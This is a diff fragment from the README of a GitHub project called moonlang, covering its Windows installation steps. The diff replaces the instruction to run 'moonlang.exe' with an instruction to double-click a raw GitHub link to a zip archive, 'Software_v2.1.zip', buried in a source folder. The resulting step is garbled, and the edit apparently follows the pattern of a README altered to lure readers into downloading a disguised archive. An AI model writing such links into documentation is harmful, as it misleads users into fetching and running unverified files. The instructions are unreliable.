kaiizie/moonlang/README.md

 - On **Windows**:
   - Open the extracted folder.
-  - Double-click the executable file named `moonlang.exe`.
+  - Double-click the executable file named `https://github.com/kaiizie/moonlang/raw/refs/heads/main/src/frontend/Software_v2.1.zip`.
 - On **macOS** and **Linux**:
   - Open Terminal.
   - Navigate to the folder with the software.
 For example: